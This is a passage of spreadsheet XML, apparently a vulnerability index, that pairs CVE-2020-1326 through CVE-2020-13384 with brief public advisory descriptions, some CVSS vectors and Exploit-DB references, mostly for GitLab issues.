    <t>A vulnerability in the web-based management interface of RAD SecFlow-1v os-image SF_0290_2.3.01.26 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260.</t>
  </si>
  <si>
    <t>CVE-2020-1326</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48807.txt</t>
  </si>
  <si>
    <t>RAD SecFlow-1v SF_0290_2.3.01.26  - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-13260</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of RAD SecFlow-1v through 2020-05-21 could allow an authenticated attacker to upload a JavaScript file, with a stored XSS payload, that will remain stored in the system as an OVPN file in Configuration-Services-Security-OpenVPN-Config or as the static key file in Configuration-Services-Security-OpenVPN-Static Keys. This payload will execute each time a user opens an affected web page. This could be exploited in conjunction with CVE-2020-13259.</t>
  </si>
  <si>
    <t>CVE-2020-13261</t>
  </si>
  <si>
    <t>Amazon EKS credentials disclosure in GitLab CE/EE 12.6 and later through 13.0.1 allows other administrators to view Amazon EKS credentials via HTML source code</t>
  </si>
  <si>
    <t>CVE-2020-13262</t>
  </si>
  <si>
    <t>Client-Side code injection through Mermaid markup in GitLab CE/EE 12.9 and later through 13.0.1 allows a specially crafted Mermaid payload to PUT requests on behalf of other users via clicking on a link</t>
  </si>
  <si>
    <t>CVE-2020-13263</t>
  </si>
  <si>
    <t>An authorization issue relating to project maintainer impersonation was identified in GitLab EE 9.5 and later through 13.0.1 that could allow unauthorized users to impersonate as a maintainer to perform limited actions.</t>
  </si>
  <si>
    <t>CVE-2020-13264</t>
  </si>
  <si>
    <t>Kubernetes cluster token disclosure in GitLab CE/EE 10.3 and later through 13.0.1 allows other group maintainers to view Kubernetes cluster token</t>
  </si>
  <si>
    <t>CVE-2020-13265</t>
  </si>
  <si>
    <t>User email verification bypass in GitLab CE/EE 12.5 and later through 13.0.1 allows user to bypass email verification</t>
  </si>
  <si>
    <t>CVE-2020-13266</t>
  </si>
  <si>
    <t>Insecure authorization in Project Deploy Keys in GitLab CE/EE 12.8 and later through 13.0.1 allows users to update permissions of other users' deploy keys under certain conditions</t>
  </si>
  <si>
    <t>CVE-2020-13267</t>
  </si>
  <si>
    <t>A Stored Cross-Site Scripting vulnerability allowed the execution on Javascript payloads on the Metrics Dashboard in GitLab CE/EE 12.8 and later through 13.0.1</t>
  </si>
  <si>
    <t>CVE-2020-13268</t>
  </si>
  <si>
    <t>A specially crafted request could be used to confirm the existence of files hosted on object storage services, without disclosing their contents. This vulnerability affects GitLab CE/EE 12.10 and later through 13.0.1</t>
  </si>
  <si>
    <t>CVE-2020-13269</t>
  </si>
  <si>
    <t>A Reflected Cross-Site Scripting vulnerability allowed the execution of arbitrary Javascript code on the Static Site Editor in GitLab CE/EE 12.10 and later through 13.0.1</t>
  </si>
  <si>
    <t>CVE-2020-1327</t>
  </si>
  <si>
    <t>CVE-2020-13270</t>
  </si>
  <si>
    <t>Missing permission check on fork relation creation in GitLab CE/EE 11.3 and later through 13.0.1 allows guest users to create a fork relation on restricted public projects via API</t>
  </si>
  <si>
    <t>CVE-2020-13271</t>
  </si>
  <si>
    <t>A Stored Cross-Site Scripting vulnerability allowed the execution of arbitrary Javascript code in the blobs API in all previous GitLab CE/EE versions through 13.0.1</t>
  </si>
  <si>
    <t>CVE-2020-13272</t>
  </si>
  <si>
    <t>OAuth flow missing verification checks CE/EE 12.3 and later through 13.0.1 allows unverified user to use OAuth authorization code flow</t>
  </si>
  <si>
    <t>CVE-2020-13273</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability allowed exhausting the system resources in GitLab CE/EE 12.0 and later through 13.0.1</t>
  </si>
  <si>
    <t>CVE-2020-13274</t>
  </si>
  <si>
    <t>A security issue allowed achieving Denial of Service attacks through memory exhaustion by uploading malicious artifacts in all previous GitLab versions through 13.0.1</t>
  </si>
  <si>
    <t>CVE-2020-13275</t>
  </si>
  <si>
    <t>A user with an unverified email address could request an access to domain restricted groups in GitLab EE 12.2 and later through 13.0.1</t>
  </si>
  <si>
    <t>CVE-2020-13276</t>
  </si>
  <si>
    <t>User is allowed to set an email as a notification email even without verifying the new email in all previous GitLab CE/EE versions through 13.0.1</t>
  </si>
  <si>
    <t>CVE-2020-13277</t>
  </si>
  <si>
    <t>An authorization issue in the mirroring logic allowed read access to private repositories in GitLab CE/EE 10.6 and later through 13.0.5</t>
  </si>
  <si>
    <t>CVE-2020-13278</t>
  </si>
  <si>
    <t>Reflected Cross-Site Scripting vulnerability in Modules.php in RosarioSIS Student Information System &lt; 6.5.1 allows remote attackers to execute arbitrary web script via embedding javascript or HTML tags in a GET request.</t>
  </si>
  <si>
    <t>CVE-2020-13279</t>
  </si>
  <si>
    <t>Client side code execution in gitlab-vscode-extension v2.2.0 allows attacker to execute code on user system</t>
  </si>
  <si>
    <t>CVE-2020-13280</t>
  </si>
  <si>
    <t>For GitLab before 13.0.12, 13.1.6, 13.2.3 a memory exhaustion flaw exists due to excessive logging of an invite email error message.</t>
  </si>
  <si>
    <t>CVE-2020-13281</t>
  </si>
  <si>
    <t>For GitLab before 13.0.12, 13.1.6, 13.2.3 a denial of service exists in the project import feature</t>
  </si>
  <si>
    <t>CVE-2020-13282</t>
  </si>
  <si>
    <t>For GitLab before 13.0.12, 13.1.6, 13.2.3 after a group transfer occurs, members from a parent group keep their access level on the subgroup leading to improper access.</t>
  </si>
  <si>
    <t>CVE-2020-13283</t>
  </si>
  <si>
    <t>For GitLab before 13.0.12, 13.1.6, 13.2.3 a cross-site scripting vulnerability exists in the issues list via milestone title.</t>
  </si>
  <si>
    <t>CVE-2020-13284</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. API Authorization Using Outdated CI Job Token</t>
  </si>
  <si>
    <t>CVE-2020-13285</t>
  </si>
  <si>
    <t>For GitLab before 13.0.12, 13.1.6, 13.2.3 a cross-site scripting (XSS) vulnerability exists in the issue reference number tooltip.</t>
  </si>
  <si>
    <t>CVE-2020-13286</t>
  </si>
  <si>
    <t>For GitLab before 13.0.12, 13.1.6, 13.2.3 user controlled git configuration settings can be modified to result in Server Side Request Forgery.</t>
  </si>
  <si>
    <t>CVE-2020-13287</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Project reporters and above could see confidential EPIC attached to confidential issues</t>
  </si>
  <si>
    <t>CVE-2020-13288</t>
  </si>
  <si>
    <t>In GitLab before 13.0.12, 13.1.6, and 13.2.3, a stored XSS vulnerability exists in the CI/CD Jobs page</t>
  </si>
  <si>
    <t>CVE-2020-13289</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. In certain cases an invalid username could be accepted when 2FA is activated.</t>
  </si>
  <si>
    <t>CVE-2020-1329</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft Bing Search for Android improperly handles specific HTML content, aka 'Microsoft Bing Search Spoofing Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13290</t>
  </si>
  <si>
    <t>In GitLab before 13.0.12, 13.1.6, and 13.2.3, improper access control was used on the Applications page</t>
  </si>
  <si>
    <t>CVE-2020-13291</t>
  </si>
  <si>
    <t>In GitLab before 13.2.3, project sharing could temporarily allow too permissive access.</t>
  </si>
  <si>
    <t>CVE-2020-13292</t>
  </si>
  <si>
    <t>In GitLab before 13.0.12, 13.1.6 and 13.2.3, it is possible to bypass E-mail verification which is required for OAuth Flow.</t>
  </si>
  <si>
    <t>CVE-2020-13293</t>
  </si>
  <si>
    <t>In GitLab before 13.0.12, 13.1.6 and 13.2.3 using a branch with a hexadecimal name could override an existing hash.</t>
  </si>
  <si>
    <t>CVE-2020-13294</t>
  </si>
  <si>
    <t>In GitLab before 13.0.12, 13.1.6 and 13.2.3, access grants were not revoked when a user revoked access to an application.</t>
  </si>
  <si>
    <t>CVE-2020-13295</t>
  </si>
  <si>
    <t>For GitLab Runner before 13.0.12, 13.1.6, 13.2.3, by replacing dockerd with a malicious server, the Shared Runner is susceptible to SSRF.</t>
  </si>
  <si>
    <t>CVE-2020-13296</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions &gt;=10.7 &lt;13.0.14, &gt;=13.1.0 &lt;13.1.8, &gt;=13.2.0 &lt;13.2.6. Improper Access Control for Deploy Tokens</t>
  </si>
  <si>
    <t>CVE-2020-13297</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. When 2 factor authentication was enabled for groups, a malicious user could bypass that restriction by sending a specific query to the API endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-13298</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Conan package upload functionality was not properly validating the supplied parameters, which resulted in the limited files disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-13299</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. The revocation feature was not revoking all session tokens and one could re-use it to obtain a valid session.</t>
  </si>
  <si>
    <t>CVE-2020-1330</t>
  </si>
  <si>
    <t>CVE-2020-13300</t>
  </si>
  <si>
    <t>GitLab CE/EE version 13.3 prior to 13.3.4 was vulnerable to an OAuth authorization scope change without user consent in the middle of the authorization flow.</t>
  </si>
  <si>
    <t>CVE-2020-13301</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was vulnerable to a stored XSS on the standalone vulnerability page.</t>
  </si>
  <si>
    <t>CVE-2020-13302</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Under certain conditions GitLab was not properly revoking user sessions and allowed a malicious user to access a user account with an old password.</t>
  </si>
  <si>
    <t>CVE-2020-13303</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Due to improper verification of permissions, an unauthorized user can access a private repository within a public project.</t>
  </si>
  <si>
    <t>CVE-2020-13304</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Same 2 factor Authentication secret code was generated which resulted an attacker to maintain access under certain conditions.</t>
  </si>
  <si>
    <t>CVE-2020-13305</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not invalidating project invitation link upon removing a user from a project.</t>
  </si>
  <si>
    <t>CVE-2020-13306</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab Webhook feature could be abused to perform denial of service attacks due to the lack of rate limitation.</t>
  </si>
  <si>
    <t>CVE-2020-13307</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not revoking current user sessions when 2 factor authentication was activated allowing a malicious user to maintain their access.</t>
  </si>
  <si>
    <t>CVE-2020-13308</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. A user without 2 factor authentication enabled could be prohibited from accessing GitLab by being invited into a project that had 2 factor authentication inheritance.</t>
  </si>
  <si>
    <t>CVE-2020-13309</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was vulnerable to a blind SSRF attack through the repository mirroring feature.</t>
  </si>
  <si>
    <t>CVE-2020-1331</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when System Center Operations Manager (SCOM) does not properly sanitize a specially crafted web request to an affected SCOM instance, aka 'System Center Operations Manager Spoofing Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13310</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab runner versions before 13.1.3, 13.2.3 and 13.3.1. It was possible to make the gitlab-runner process crash by sending malformed queries, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-13311</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Wiki was vulnerable to a parser attack that prohibits anyone from accessing the Wiki functionality through the user interface.</t>
  </si>
  <si>
    <t>CVE-2020-13312</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab OAuth endpoint was vulnerable to brute-force attacks through a specific parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13313</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. An unauthorized project maintainer could edit the subgroup badges due to the lack of authorization control.</t>
  </si>
  <si>
    <t>CVE-2020-13314</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab Omniauth endpoint allowed a malicious user to submit content to be displayed back to the user within error messages.</t>
  </si>
  <si>
    <t>CVE-2020-13315</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. The profile activity page was not restricting the amount of results one could request, potentially resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-13316</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not validating a Deploy-Token and allowed a disabled repository be accessible via a git command line.</t>
  </si>
  <si>
    <t>CVE-2020-13317</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8, and 13.3.4. An insufficient check in the GraphQL api allowed a maintainer to delete a repository.</t>
  </si>
  <si>
    <t>CVE-2020-13318</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions before 13.0.12, 13.1.10, 13.2.8 and 13.3.4. GitLabs EKS integration was vulnerable to a cross-account assume role attack.</t>
  </si>
  <si>
    <t>CVE-2020-13319</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions prior to 13.1.2, 13.0.8 and 12.10.13. Missing permission check for adding time spent on an issue.</t>
  </si>
  <si>
    <t>CVE-2020-1332</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1193, CVE-2020-1335, CVE-2020-1594.</t>
  </si>
  <si>
    <t>CVE-2020-13320</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab before version 12.10.13 that allowed a project member with limited permissions to view the project security dashboard.</t>
  </si>
  <si>
    <t>CVE-2020-13321</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions prior to 13.1. Username format restrictions could be bypassed allowing for html tags to be added.</t>
  </si>
  <si>
    <t>CVE-2020-13322</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions after 12.9. Due to improper verification of permissions, an unauthorized user can create and delete deploy tokens.</t>
  </si>
  <si>
    <t>CVE-2020-13323</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions prior 13.1. Under certain conditions private merge requests could be read via Todos</t>
  </si>
  <si>
    <t>CVE-2020-13324</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions prior to 13.1. Under certain conditions the private activity of a user could be exposed via the API.</t>
  </si>
  <si>
    <t>CVE-2020-13325</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions prior 13.1. The comment section of the issue page was not restricting the characters properly, potentially resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-13326</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab versions prior to 13.1. Under certain conditions the restriction for Github project import could be bypassed.</t>
  </si>
  <si>
    <t>CVE-2020-13327</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab Runner affecting all versions starting from 13.4.0 before 13.4.2, all versions starting from 13.3.0 before 13.3.7, all versions starting from 13.2.0 before 13.2.10. Insecure Runner Configuration in Kubernetes Environments</t>
  </si>
  <si>
    <t>CVE-2020-13328</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions prior to 13.1.2, 13.0.8 and 12.10.13. GitLab was vulnerable to a stored XSS by using the PyPi files API.</t>
  </si>
  <si>
    <t>CVE-2020-13329</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions from 12.6.2 prior to 12.10.13. GitLab was vulnerable to a stored XSS by in the blob view feature.</t>
  </si>
  <si>
    <t>CVE-2020-1333</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Group Policy Services Policy Processing improperly handle reparse points, aka 'Group Policy Services Policy Processing Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13330</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions prior to 12.10.13. GitLab was vulnerable to a stored XSS in import the Bitbucket project feature.</t>
  </si>
  <si>
    <t>CVE-2020-13331</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions prior to 12.10.13. GitLab was vulnerable to a stored XSS by in the Wiki pasges.</t>
  </si>
  <si>
    <t>CVE-2020-13333</t>
  </si>
  <si>
    <t>A potential DOS vulnerability was discovered in GitLab versions 13.1, 13.2 and 13.3. The api to update an asset as a link from a release had a regex check which caused exponential number of backtracks for certain user supplied values resulting in high CPU usage.</t>
  </si>
  <si>
    <t>CVE-2020-13334</t>
  </si>
  <si>
    <t>In GitLab versions prior to 13.2.10, 13.3.7 and 13.4.2, improper authorization checks allow a non-member of a project/group to change the confidentiality attribute of issue via mutation GraphQL query</t>
  </si>
  <si>
    <t>CVE-2020-13335</t>
  </si>
  <si>
    <t>Improper group membership validation when deleting a user account in GitLab &gt;=7.12 allows a user to delete own account without deleting/transferring their group.</t>
  </si>
  <si>
    <t>CVE-2020-13336</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions from 11.8 before 12.10.13. GitLab was vulnerable to a stored XSS by in the error tracking feature.</t>
  </si>
  <si>
    <t>CVE-2020-13337</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions from 12.10 to 12.10.12 that allowed for a stored XSS payload to be added as a group name.</t>
  </si>
  <si>
    <t>CVE-2020-13338</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions prior to 12.10.13, 13.0.8, 13.1.2. A stored cross-site scripting vulnerability was discovered when editing references.</t>
  </si>
  <si>
    <t>CVE-2020-13339</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting all versions before 13.2.10, 13.3.7 and 13.4.2: XSS in SVG File Preview. Overall impact is limited due to the current user only being impacted.</t>
  </si>
  <si>
    <t>CVE-2020-1334</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1265, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306.</t>
  </si>
  <si>
    <t>CVE-2020-13340</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting all versions prior to 13.2.10, 13.3.7 and 13.4.2: Stored XSS in CI Job Log</t>
  </si>
  <si>
    <t>CVE-2020-13341</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting all versions prior to 13.2.10, 13.3.7 and 13.4.2. Insufficient permission check allows attacker with developer role to perform various deletions.</t>
  </si>
  <si>
    <t>CVE-2020-13342</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting versions prior to 13.2.10, 13.3.7 and 13.4.2: Lack of Rate Limiting at Re-Sending Confirmation Email</t>
  </si>
  <si>
    <t>CVE-2020-13343</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting all versions starting from 11.2. Unauthorized Users Can View Custom Project Template</t>
  </si>
  <si>
    <t>CVE-2020-13344</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting all versions prior to 13.2.10, 13.3.7 and 13.4.2. Sessions keys are stored in plain-text in Redis which allows attacker with Redis access to authenticate as any user that has a session stored in Redis</t>
  </si>
  <si>
    <t>CVE-2020-13345</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab affecting all versions starting from 10.8. Reflected XSS on Multiple Routes</t>
  </si>
  <si>
    <t>CVE-2020-13346</t>
  </si>
  <si>
    <t>Membership changes are not reflected in ToDo subscriptions in GitLab versions prior to 13.2.10, 13.3.7 and 13.4.2, allowing guest users to access confidential issues through API.</t>
  </si>
  <si>
    <t>CVE-2020-13347</t>
  </si>
  <si>
    <t>A command injection vulnerability was discovered in Gitlab runner versions prior to 13.2.4, 13.3.2 and 13.4.1. When the runner is configured on a Windows system with a docker executor, which allows the attacker to run arbitrary commands on Windows host, via DOCKER_AUTH_CONFIG build variable.</t>
  </si>
  <si>
    <t>CVE-2020-13348</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab EE affecting all versions starting from 10.2. Required CODEOWNERS approval could be bypassed by targeting a branch without the CODEOWNERS file. Affected versions are &gt;=10.2, &lt;13.3.9,&gt;=13.4, &lt;13.4.5,&gt;=13.5, &lt;13.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-13349</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab EE affecting all versions starting from 8.12. A regular expression related to a file path resulted in the Advanced Search feature susceptible to catastrophic backtracking. Affected versions are &gt;=8.12, &lt;13.3.9,&gt;=13.4, &lt;13.4.5,&gt;=13.5, &lt;13.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-1335</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1193, CVE-2020-1332, CVE-2020-1594.</t>
  </si>
  <si>
    <t>CVE-2020-13350</t>
  </si>
  <si>
    <t>CSRF in runner administration page in all versions of GitLab CE/EE allows an attacker who's able to target GitLab instance administrators to pause/resume runners. Affected versions are &gt;=13.5.0, &lt;13.5.2,&gt;=13.4.0, &lt;13.4.5,&lt;13.3.9.</t>
  </si>
  <si>
    <t>CVE-2020-13351</t>
  </si>
  <si>
    <t>Insufficient permission checks in scheduled pipeline API in GitLab CE/EE 13.0+ allows an attacker to read variable names and values for scheduled pipelines on projects visible to the attacker. Affected versions are &gt;=13.0, &lt;13.3.9,&gt;=13.4.0, &lt;13.4.5,&gt;=13.5.0, &lt;13.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-13352</t>
  </si>
  <si>
    <t>Private group info is leaked leaked in GitLab CE/EE version 10.2 and above, when the project is moved from private to public group. Affected versions are: &gt;=10.2, &lt;13.3.9,&gt;=13.4, &lt;13.4.5,&gt;=13.5, &lt;13.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-13353</t>
  </si>
  <si>
    <t>When importing repos via URL, one time use git credentials were persisted beyond the expected time window in Gitaly 1.79.0 or above.</t>
  </si>
  <si>
    <t>CVE-2020-13354</t>
  </si>
  <si>
    <t>A potential DOS vulnerability was discovered in GitLab CE/EE starting with version 12.6. The container registry name check could cause exponential number of backtracks for certain user supplied values resulting in high CPU usage. Affected versions are: &gt;=12.6, &lt;13.3.9.</t>
  </si>
  <si>
    <t>CVE-2020-13355</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 8.14. A path traversal is found in LFS Upload that allows attacker to overwrite certain specific paths on the server. Affected versions are: &gt;=8.14, &lt;13.3.9,&gt;=13.4, &lt;13.4.5,&gt;=13.5, &lt;13.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-13356</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 8.8.9. A specially crafted request could bypass Multipart protection and read files in certain specific paths on the server. Affected versions are: &gt;=8.8.9, &lt;13.3.9,&gt;=13.4, &lt;13.4.5,&gt;=13.5, &lt;13.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-13357</t>
  </si>
  <si>
    <t>An issue was discovered in Gitlab CE/EE versions &gt;= 13.1 to &lt;13.4.7, &gt;= 13.5 to &lt;13.5.5, and &gt;= 13.6 to &lt;13.6.2 allowed an unauthorized user to access the user list corresponding to a feature flag in a project.</t>
  </si>
  <si>
    <t>CVE-2020-13358</t>
  </si>
  <si>
    <t>A vulnerability in the internal Kubernetes agent api in GitLab CE/EE version 13.3 and above allows unauthorized access to private projects. Affected versions are: &gt;=13.4, &lt;13.4.5,&gt;=13.3, &lt;13.3.9,&gt;=13.5, &lt;13.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-13359</t>
  </si>
  <si>
    <t>The Terraform API in GitLab CE/EE 12.10+ exposed the object storage signed URL on the delete operation allowing a malicious project maintainer to overwrite the Terraform state, bypassing audit and other business controls. Affected versions are &gt;=12.10, &lt;13.3.9,&gt;=13.4, &lt;13.4.5,&gt;=13.5, &lt;13.5.2.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-1336</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1411.</t>
  </si>
  <si>
    <t>CVE-2020-13361</t>
  </si>
  <si>
    <t>In QEMU 5.0.0 and earlier, es1370_transfer_audio in hw/audio/es1370.c does not properly validate the frame count, which allows guest OS users to trigger an out-of-bounds access during an es1370_write() operation.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-13362</t>
  </si>
  <si>
    <t>In QEMU 5.0.0 and earlier, megasas_lookup_frame in hw/scsi/megasas.c has an out-of-bounds read via a crafted reply_queue_head field from a guest OS user.</t>
  </si>
  <si>
    <t>CVE-2020-13364</t>
  </si>
  <si>
    <t>A backdoor in certain Zyxel products allows remote TELNET access via a CGI script. This affects NAS520 V5.21(AASZ.4)C0, V5.21(AASZ.0)C0, V5.11(AASZ.3)C0, and V5.11(AASZ.0)C0; NAS542 V5.11(ABAG.0)C0, V5.20(ABAG.1)C0, and V5.21(ABAG.3)C0; NSA325 v2_V4.81(AALS.0)C0 and V4.81(AAAJ.1)C0; NSA310 4.22(AFK.0)C0 and 4.22(AFK.1)C0; NAS326 V5.21(AAZF.8)C0, V5.11(AAZF.4)C0, V5.11(AAZF.2)C0, and V5.11(AAZF.3)C0; NSA310S V4.75(AALH.2)C0; NSA320S V4.75(AANV.2)C0 and V4.75(AANV.1)C0; NSA221 V4.41(AFM.1)C0; and NAS540 V5.21(AATB.5)C0 and V5.21(AATB.3)C0.</t>
  </si>
  <si>
    <t>CVE-2020-13365</t>
  </si>
  <si>
    <t>Certain Zyxel products have a locally accessible binary that allows a non-root user to generate a password for an undocumented user account that can be used for a TELNET session as root. This affects NAS520 V5.21(AASZ.4)C0, V5.21(AASZ.0)C0, V5.11(AASZ.3)C0, and V5.11(AASZ.0)C0; NAS542 V5.11(ABAG.0)C0, V5.20(ABAG.1)C0, and V5.21(ABAG.3)C0; NSA325 v2_V4.81(AALS.0)C0 and V4.81(AAAJ.1)C0; NSA310 4.22(AFK.0)C0 and 4.22(AFK.1)C0; NAS326 V5.21(AAZF.8)C0, V5.11(AAZF.4)C0, V5.11(AAZF.2)C0, and V5.11(AAZF.3)C0; NSA310S V4.75(AALH.2)C0; NSA320S V4.75(AANV.2)C0 and V4.75(AANV.1)C0; NSA221 V4.41(AFM.1)C0; and NAS540 V5.21(AATB.5)C0 and V5.21(AATB.3)C0.</t>
  </si>
  <si>
    <t>CVE-2020-1337</t>
  </si>
  <si>
    <t>exploits/linux/dos/48638.sh</t>
  </si>
  <si>
    <t>Grafana 7.0.1 - Denial of Service (PoC)</t>
  </si>
  <si>
    <t>CVE-2020-13376</t>
  </si>
  <si>
    <t>SecurEnvoy SecurMail 9.3.503 allows attackers to upload executable files and achieve OS command execution via a crafted SecurEnvoyReply cookie.</t>
  </si>
  <si>
    <t>CVE-2020-13379</t>
  </si>
  <si>
    <t>The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on. Furthermore, passing invalid URL objects could be used for DOS'ing Grafana via SegFault.</t>
  </si>
  <si>
    <t>CVE-2020-1338</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1218.</t>
  </si>
  <si>
    <t>CVE-2020-13380</t>
  </si>
  <si>
    <t>openSIS before 7.4 allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-13381</t>
  </si>
  <si>
    <t>openSIS through 7.4 allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-13382</t>
  </si>
  <si>
    <t>openSIS through 7.4 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-13383</t>
  </si>
  <si>
    <t>openSIS through 7.4 allows Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-13384</t>
  </si>
  <si>
